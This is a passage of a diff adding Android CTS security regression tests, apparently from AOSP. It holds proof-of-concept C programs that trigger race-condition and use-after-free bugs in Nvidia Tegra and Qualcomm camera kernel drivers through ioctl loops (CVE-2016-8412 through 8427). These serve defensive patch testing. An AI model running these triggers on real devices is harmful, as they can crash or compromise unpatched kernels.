+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SUBMIT 0x08
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_submit {
+ __u64 context;
+ __u32 num_syncpts;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 waitchk_mask;
+ __u32 timeout;
+ __u64 syncpts;
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 waitchks;
+ __u32 fence; /* Return value */
+ __u32 reserved0;
+ __u64 fences;
+ __u32 reserved1[2]; /* future expansion */
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+int fd;
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_submit submit_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* submit_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ ret = pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+ if(ret){
+ goto out_submit_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set submit */
+ submit_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_submit_thread:
+ /* kill submit thread */
+ for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+ pthread_kill(submit_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
new file mode 100644
index 0000000..bba13f3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8412
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
new file mode 100644
index 0000000..d438b40
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8412/poc.c
@@ -0,0 +1,69 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <signal.h>
+
+#define VIDIOC_MSM_ACTUATOR_CFG 0xc0d056c6
+#define MSM_SD_SHUTDOWN 0xc00856dd
+
+int fd;
+
+
+int main() {
+ long i;
+ int pid;
+ pthread_t th[6];
+ int argn[50] = {0};
+
+ fd = open("/dev/v4l-subdev7", 0x0ul );
+
+
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ pid = fork();
+ if(!pid){
+ argn[0] = 1;
+ while(1){
+ usleep(10);
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+ }
+ }
+ i = 0;
+ while(1){
+ i++;
+ argn[0] = 7;
+ syscall(__NR_ioctl, fd, VIDIOC_MSM_ACTUATOR_CFG, argn, 0, 0, 0);
+
+ usleep(100);
+
+ argn[0] = 0;
+ syscall(__NR_ioctl, fd, MSM_SD_SHUTDOWN, argn, 0, 0, 0);
+
+ }
+
+ close(fd);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
new file mode 100644
index 0000000..5ff169b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8424
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
new file mode 100644
index 0000000..4460b88
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8424/poc.c
@@ -0,0 +1,138 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ //printf("[*] NVMAP_IOC_CREATE, fd(%d), last error = %d\n", g_allocation->handle, errno);
+}
+
+void trigger_nvmap_free() {
+ static int data = 1024;
+ ioctl(g_fd, NVMAP_IOC_FREE, data);
+ //printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+static int init = 0;
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(0, 2);
+
+ int i;
+ while (1) {
+ if (init == 0) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ init = 1;
+ }
+ trigger_nvmap_free();
+ }
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ if (init == 0)
+ pthread_cond_signal(&cond);
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
new file mode 100644
index 0000000..e984812
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8425
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
new file mode 100644
index 0000000..498bca4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8425/poc.c
@@ -0,0 +1,140 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-vic"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
new file mode 100644
index 0000000..a134d9c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8426
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
new file mode 100644
index 0000000..c423416
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8426/poc.c
@@ -0,0 +1,147 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/nvhost-gpu"
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+pthread_t toggle_thread_id;
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ return;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ usleep(200);
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvhost_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ printf("[+] open OK\n");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ printf("[+] create close thread %d failed %d %s\n", i, errno, strerror(errno));
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ printf("[+] %03d times\n", i);
+ /* open */
+ ret = ioctl(fd, NVHOST_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ printf("[+] ioctl OK, fd = %d\n", o_args.channel_fd);
+ }
+ usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
new file mode 100644
index 0000000..131f240
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8427
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
new file mode 100644
index 0000000..0c54420
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8427/poc.c
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <stdint.h>
+#include <pthread.h>
+#include <linux/ion.h>
+
+#define NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL 0xc0084401ul
+
+
+int fd_gpu;
+int fd_dbg;
+int fd_dbg_1;
+
+void *thr(void *arg)
+{
+ int ioarg[2];
+ switch ((long)arg) {
+ case 0:
+ fd_dbg = open("/dev/nvhost-dbg-gpu",0x0ul,0x101000ul);
+ break;
+ case 1:
+ fd_dbg_1 = dup3(fd_dbg, fd_dbg,0x80000ul);
+ break;
+ case 2:
+ ioarg[0] = fd_dbg_1;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg, 0, 0, 0);
+ break;
+ case 3:
+ fd_gpu = open("/dev/nvhost-gpu",0x0ul,0x2000ul);
+ break;
+ case 4:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ case 5:
+ ioarg[0] = fd_gpu;
+ ioarg[1] = 0;
+ ioctl(fd_dbg,NVHOST_DBG_GPU_IOCTL_BIND_CHANNEL,ioarg);
+ break;
+ }
+ return 0;
+}
+int poc()
+{
+ long i;
+ pthread_t th;
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ usleep(10000);
+ }
+ for (i = 0; i < 6; i++) {
+ pthread_create(&th, 0, thr, (void*)i);
+ if (i%2==0)
+ usleep(10000);
+ }
+ usleep(100000);
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ while(1){
+ pid = fork();
+ if(pid){
+ usleep(30000);
+ }else
+ return poc();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
new file mode 100644
index 0000000..21326f9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
